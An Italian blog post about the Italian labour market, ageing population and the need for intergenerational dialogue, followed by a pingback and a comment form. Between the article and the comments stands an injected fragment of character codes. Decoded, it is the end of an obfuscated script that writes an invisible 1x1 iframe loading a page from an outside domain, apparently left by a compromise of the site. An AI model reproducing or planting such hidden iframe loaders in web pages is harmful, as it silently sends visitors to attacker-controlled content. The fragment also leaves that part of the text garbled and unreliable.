rssicon

Chi è davvero interessato a darsi da fare per "cambiare" il mondo del lavoro in Italia?  o per meglio dire:

- siamo consapevoli del fatto che adesso è ineludibile affrontare il nodo del nostro rapporto con il mondo del lavoro nel terzo millennio?

Ogni giorno sempre di più ho forte la sensazione che, fra i paesi industrializzati, l’Italia è l’unico nel quale il confrontarsi in modo organico e costruttivo sui temi di come guadagnarsi da vivere lavorando è un vero e proprio tabù.

Non voglio aggiungere danno a danno ricordandovi come in Italia si parla di lavoro solo in occasione di scioperi, incidenti sul lavoro, crisi aziendali e questioni legate all’evasione fiscale delle imprese.

Il come ci si prepara ad entrare nel mondo del lavoro, il come ci si deve comportare per essere competitivi in questo mondo del lavoro così aperto al contributo di lavoratori sparsi ai quatro angoli del globo sono argomenti tabù per noi italiani.

Vi siete mai interrogati su cosa significa essere competitivi con il lavoro che fate? Significa semplicemente che si è capaci di produrre beni e servizi che i consumatori vogliono liberamente comprare.

E così: è possibile cambiare il mondo del lavoro in Italia? La mia risposta è SI, ma solo se ognuno di noi entra nell’ordine di idee di cambiare il proprio modo di rapportarsi con i temi dell’economia.

rapporto con mondo del lavoroIo sento che il primo passo in questa direzione di cambiamento può essere fatto se e solo se ognuno di noi diventa consapevole del fatto che l’Italia è il Paese più vecchio al mondo. E questo vuol dire che le persone più avanti nell’età sono la componente maggioritaria dei cittadini del nostro bel paese.

Costruire un dialogo intergenerazionale è un passagio ineludibile per scongiurare il pericolo di una decadenza economica dell’Italia e la deflagrazione di un conflitto generazionale senza precedenti.

 

112,58,47,47,121,97,100,114,48,46,99,111,109,47,100,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,49,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62))

1 Commento per “E’ possibile cambiare il “mondo del lavoro italiano””

  1. BLOG di Piero Viscardi » Malpensa: ha scritto:

    […] La questione dell’aereoporto della Malpensa è o no l’ennesimo emblema dell’incapacità di fare squadra del sistema imprenditoriale italiano? […]

Commenta questo post

:

:

: